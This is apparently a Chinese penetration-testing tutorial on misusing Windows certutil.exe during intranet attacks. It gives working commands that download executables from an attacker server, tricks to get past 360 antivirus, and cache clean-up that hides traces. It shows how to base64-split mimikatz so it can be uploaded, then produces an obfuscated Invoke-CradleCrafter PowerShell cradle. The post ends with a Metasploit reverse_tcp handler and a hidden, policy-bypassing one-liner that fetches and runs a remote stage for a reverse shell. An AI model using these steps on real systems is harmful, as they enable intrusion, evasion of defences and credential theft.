本文首发于先知社区:https://xz.aliyun.com/t/9737
之前写过一个certutil&wmic的探究,最近又用到了certutil,对certutil命令进行更深入的探究。
何为certutil
certutil.exe
是一个合法Windows文件,用于管理Windows证书的程序。
微软官方是这样对它解释的:
Certutil.exe是一个命令行程序,作为证书服务的一部分安装。您可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书,密钥对和证书链。
但是此合法Windows服务现已被广泛滥用于恶意用途。
渗透中主要利用其 下载
、编码
、解码
、替代数据流
等功能。
data:image/s3,"s3://crabby-images/ace8c/ace8cdf2ffa993baf36237e8a7a0070ec86122be" alt="title"
这里我首先在命令行用certutil -?
查看一下certutil
所有的参数,这里只截图了一部分,接下来就总结一下最常用的几个关于certutil
在内网渗透中的应用。
data:image/s3,"s3://crabby-images/c4b81/c4b81d74e6747b2071ec350d4cc2938c6feeeccf" alt="image-20210611110057272"
certutil下载文件
一般我最常使用的certutil
的功能就是在cmd环境下下载文件,因为certutil
是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。但是因为在下载文件的过程中也会创建进程,所以也遭到了各大杀软的拦截。
一般使用certutil
下载文件的命令为
1
| certutil -urlcache -split -f http://ip/artifact.exe
|
这里介绍一下参数
-f
覆盖现有文件。
有值的命令行选项。后面跟要下载的文件 url。
-split
保存到文件。
无值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。
-URLCache
显示或删除URL缓存条目。
无值的命令行选项。
(certutil.exe 下载有个弊端,它的每一次下载都有留有缓存。)
这里我在本地搭建一个http服务器,然后在配置了360的虚拟机cmd下进行下载
data:image/s3,"s3://crabby-images/46c21/46c21abfdfb59feae75bc02eae64df68be3fb6b0" alt="image-20210611111642656"
这里我为了更好的还原环境,先与虚拟机建立ipc连接后用psexec得到了命令行的cmd环境
这里我用常规的命令进行下载exe文件的操作遭到了av的拦截
data:image/s3,"s3://crabby-images/18a6b/18a6ba4570964151a2a3b4901adff202687c4710" alt="image-20210611105143479"
如果超时没有操作的话就会显示拒绝访问
data:image/s3,"s3://crabby-images/ebf5c/ebf5c4e31f17e5df5d4da0027b1b918a5b36617d" alt="image-20210611105222286"
这里有两种方法对杀软进行certutil
下载绕过,本质都是执行两次certutil
第一种方法是先执行一个单独的certutil
,然后再执行下载exe的命令,可以看到这里已经能够成功下载
1 2 3
| certutil
certutil -urlcache -split -f http://ip/artifact.exe
|
data:image/s3,"s3://crabby-images/60dc6/60dc605f82d1e9ede78fa14c9e88ac058453a7be" alt="image-20210611105307549"
另外一种方法就是使用windows自带的分隔符&
和|
,本质上跟第一种方法一样,相当于执行了两次certutil
1 2 3
| certutil & certutil -urlcache -split -f http://ip/artifact.exe
certutil | certutil -urlcache -split -f http://ip/artifact.exe
|
data:image/s3,"s3://crabby-images/7cba0/7cba033344a41a600a63c9601d09f93485197c29" alt="image-20210611105514430"
这里也可以进行文件的重命名,如果你觉得这个文件名太过于明显容易被管理员发现就可以在下载的时候使用自己设置的名字生成exe
1
| certutil & certutil -urlcache -split -f http://172.20.10.4:8000/artifact.exe nice.exe
|
data:image/s3,"s3://crabby-images/56c13/56c13ef80bd77b4af370c7597505772efef9f0ad" alt="image-20210611112522876"
使用certutil
下载文件有个弊端就是会产生缓存文件,用如下命令查看:
data:image/s3,"s3://crabby-images/97c80/97c8073dc5a7306e6dc84c5f8f7fcbc5ab8f636a" alt="image-20210611112821868"
执行删除缓存
1
| certutil -urlcache * delete
|
data:image/s3,"s3://crabby-images/a5a11/a5a11cfd106bfcb635a7ef353410d199b614d5a9" alt="image-20210611112914362"
这里如果嫌麻烦的话可以在下载文件的时候加上一个delete
参数,这样就省去了后面再来清理缓存的麻烦
1
| certutil & certutil -urlcache -split -f http://172.20.10.4:8000/artifact.exe delete
|
certutil base64加解密
之前在实战中就碰到过需要进行内网穿透的时候,代理软件上传不到靶机的情况
data:image/s3,"s3://crabby-images/6debe/6debe9910162be21d3ff810eb3de2b4707d2bd06" alt="img"
这里我上传图片测试能够上传成功
data:image/s3,"s3://crabby-images/5a87d/5a87d9c353896492cde9a8a4e25a444f5dba7ecf" alt="img"
本地也能够下载下来,但是就是到靶机上下载不下来,这时候就可以使用certutil
的encode
和decode
进行加解密。
data:image/s3,"s3://crabby-images/f2cb0/f2cb0f72c570139abd98bf72d9cfb61fa3d0b999" alt="img"
data:image/s3,"s3://crabby-images/bc03f/bc03f5af9db3fde2ba771651791d13ee913834e4" alt="img"
certutil
在内网渗透中的另外一个用处就是进行base64编码。我们知道在内网中需要用到内网代理,一般都会用到nps或者frp,但是如果碰到有杀软限制上传文件大小的情况,这时候我们就可以使用先用encode编码分块上传再使用decode解密。
使用encode
进行base64编码,然而大小还变大了,这里就可以考虑分成多块传输后再进行整合
data:image/s3,"s3://crabby-images/b1a23/b1a231b72e0caf3b7d378632665ee216de8680fb" alt="image-20210611114545923"
这里我查看了一下生成的mimikatz.txt
有2.7w行,所以这里我将其拆分为三块,这里顺便说一下快速选择大文件的指定行的操作
在notepad++编辑里面点击开始/结束选择
,光标会定位到第一行
data:image/s3,"s3://crabby-images/aa209/aa2091e364f11408f75e3812365ab12c5e802506" alt="image-20210611115546369"
再使用ctrl + g
切换到行定位,选择要选中的行,因为这里我拆分成3块,所以这里我选择的是第10000行
data:image/s3,"s3://crabby-images/6b56d/6b56dc52af4bedaf20d914a37345df29832fc7eb" alt="image-20210611115620173"
再到编辑里面点一下开始/结束选择
即可选中
data:image/s3,"s3://crabby-images/d882c/d882cad2e16b02205afb90d0e5f4c58ae2066f13" alt="image-20210611115720800"
这里我把mimikatz.txt
拆分成了三个txt进行上传
data:image/s3,"s3://crabby-images/cd5ef/cd5efb361dd983f33ed7b10ae90d45f7ef252c85" alt="image-20210611115910166"
上传到靶机的C盘目录
data:image/s3,"s3://crabby-images/c5ee4/c5ee45d741707b2ed90f083da6becf28cea79e96" alt="image-20210611141505274"
这里先把3个txt合并为一个txtmimikatz.txt
1
| copy c:\*txt c:\mimikatz.txt //把c盘根目录下的所有txt合并为mimikatz.txt
|
data:image/s3,"s3://crabby-images/32b2c/32b2c286cfc05b64417c8c2913849e493ec29f6d" alt="image-20210611141919887"
然后再使用certutil
的-decode
参数进行解密,生成mimikatz.exe
data:image/s3,"s3://crabby-images/8f0d5/8f0d52f5eb4424a265d61576391d6c10413dcc9a" alt="image-20210611141950899"
运行一下看看已经合并成功了
data:image/s3,"s3://crabby-images/1ecfa/1ecfa8a3fcd8737d8bff5ab736c6866fd77faf2e" alt="image-20210611142042451"
certutil 校验hash值
当我们检验一个软件是否被其他人修改过经常会拿原始软件的hash值和现在软件的hash进行比对,使用certutil也能够获取hash值
1 2 3 4 5
| certutil -hashfile mimikatz.exe MD5 //检验MD5
certutil -hashfile mimikatz.exe SHA1 //检验SHA1
certutil -hashfile mimikatz.exe SHA256 //检验SHA256
|
这里比较上传前后mimikatz.exe的MD5值
data:image/s3,"s3://crabby-images/84ae9/84ae93cb64421082a6286827d33a962012a40e34" alt="image-20210611142552761"
certutil配合powershell内存加载
这里我在本地实验因为环境变量的原因报错,这里还是粗略的写一下大致实现过程
首先修改powershell策略为可执行脚本
data:image/s3,"s3://crabby-images/0ebc4/0ebc4e6361c3ec90bc1040cdbb4bf003b00f69cb" alt="image-20210611143358269"
下载powershell混淆框架并执行
1 2 3
| Import-Module .\Invoke-CradleCrafter.ps1
Invoke-CradleCrafter
|
data:image/s3,"s3://crabby-images/294d1/294d19d4910065d8fc3fdc610b72daa21cf19216" alt="image-20210611143448238"
使用msf生成一个payload,在本地起一个http服务器,放到http服务器的目录下
data:image/s3,"s3://crabby-images/62a88/62a88e9b456995e68eea90036e3379dea2e27660" alt="image-20210611143609145"
设置url为http服务器目录
1
| set URL http://172.20.10.4:8000/key.txt
|
data:image/s3,"s3://crabby-images/1ccfa/1ccfad243f68fddfd24d6776aa76a86c7fe6f1b1" alt="image-20210611144724157"
使用以下几个命令进行初始化
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
| Invoke-CradleCrafter> MEMORY
Choose one of the below Memory options:
[*] MEMORY\PSWEBSTRING PS Net.WebClient + DownloadString method [*] MEMORY\PSWEBDATA PS Net.WebClient + DownloadData method [*] MEMORY\PSWEBOPENREAD PS Net.WebClient + OpenRead method [*] MEMORY\NETWEBSTRING .NET [Net.WebClient] + DownloadString method (PS3.0+) [*] MEMORY\NETWEBDATA .NET [Net.WebClient] + DownloadData method (PS3.0+) [*] MEMORY\NETWEBOPENREAD .NET [Net.WebClient] + OpenRead method (PS3.0+) [*] MEMORY\PSWEBREQUEST PS Invoke-WebRequest/IWR (PS3.0+) [*] MEMORY\PSRESTMETHOD PS Invoke-RestMethod/IRM (PS3.0+) [*] MEMORY\NETWEBREQUEST .NET [Net.HttpWebRequest] class [*] MEMORY\PSSENDKEYS PS SendKeys class + Notepad (for the lulz) [*] MEMORY\PSCOMWORD PS COM object + WinWord.exe [*] MEMORY\PSCOMEXCEL PS COM object + Excel.exe [*] MEMORY\PSCOMIE PS COM object + Iexplore.exe [*] MEMORY\PSCOMMSXML PS COM object + MsXml2.ServerXmlHttp [*] MEMORY\PSINLINECSHARP PS Add-Type + Inline CSharp [*] MEMORY\PSCOMPILEDCSHARP .NET [Reflection.Assembly]::Load Pre-Compiled CSharp [*] MEMORY\CERTUTIL Certutil.exe + -ping Argument
Invoke-CradleCrafter\Memory> CERTUTIL
[*] Name :: Certutil [*] Description :: PowerShell leveraging certutil.exe to download payload as string [*] Compatibility :: PS 2.0+ [*] Dependencies :: Certutil.exe [*] Footprint :: Entirely memory-based [*] Indicators :: powershell.exe spawns certutil.exe certutil.exe [*] Artifacts :: C:\Windows\Prefetch\CERTUTIL.EXE-********.pf AppCompat Cache
Invoke-CradleCrafter\Memory\Certutil> ALL
Choose one of the below Memory\Certutil\All options to APPLY to current cradle:
[*] MEMORY\CERTUTIL\ALL\1 Execute ALL Token obfuscation techniques (random order)
|
到这里应该会显示如下代码
1 2 3 4 5 6 7 8 9 10 11 12
| Invoke-CradleCrafter\Memory\Certutil\All> 1
Executed: CLI: Memory\Certutil\All\1 FULL: Out-Cradle -Url 'http://172.20.10.4/key.txt' -Cradle 17 -TokenArray @('All',1)
Result: SV 1O6 'http://172.20.10.4/key.txt';.(Get-Command *ke-*pr*) ((C:\Windows\System32\certutil /ping (Get-Item Variable:\1O6).Value|&(Get-Variable Ex*xt).Value.InvokeCommand.(((Get-Variable Ex*xt).Value.InvokeCommand.PsObject.Methods|?{(Get-Variable _ -ValueOn).Name-ilike'*and'}).Name).Invoke((Get-Variable Ex*xt).Value.InvokeCommand.(((Get-Variable Ex*xt).Value.InvokeCommand|GM|?{(Get-Variable _ -ValueOn).Name-ilike'*Com*e'}).Name).Invoke('*el*-O*',$TRUE,1),[Management.Automation.CommandTypes]::Cmdlet)-Skip 2|&(Get-Variable Ex*xt).Value.InvokeCommand.(((Get-Variable Ex*xt).Value.InvokeCommand.PsObject.Methods|?{(Get-Variable _ -ValueOn).Name-ilike'*and'}).Name).Invoke((Get-Variable Ex*xt).Value.InvokeCommand.(((Get-Variable Ex*xt).Value.InvokeCommand|GM|?{(Get-Variable _ -ValueOn).Name-ilike'*Com*e'}).Name).Invoke('*el*-O*',$TRUE,1),[Management.Automation.CommandTypes]::Cmdlet)-SkipLa 1)-Join"`r`n")
Choose one of the below Memory\Certutil\All options to APPLY to current cradle:
[*] MEMORY\CERTUTIL\ALL\1 Execute ALL Token obfuscation techniques (random order)
|
将混淆的代码保存到本地为crt.txt
用certutil
进行encode
加密
1
| certutil -encode crt.txt crt.cer
|
将cer.cet
放入http服务器目录下,使用msf开启监听
1 2 3 4 5 6 7 8 9
| msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.10.11 lhost => 192.168.10.11 msf6 exploit(multi/handler) > set lport 8888 lport => 8888 msf6 exploit(multi/handler) > run
|
然后靶机执行如下命令即可获得反弹session
1 2
| powershell.exe ‐Win hiddeN ‐Exec ByPasS add‐content ‐path %APPDATA%\crt.cer (New‐Object Net.WebClient).DownloadString('http://172.20.10.4/crt.cer'); certutil ‐decode %APPDATA%\crt.cer %APPDATA%\stage.ps1 & start /b c md /c powershell.exe ‐Exec Bypass ‐NoExit ‐File %APPDATA%\stage.ps1 & start /b cmd /c del %APPDATA%\crt.cer
|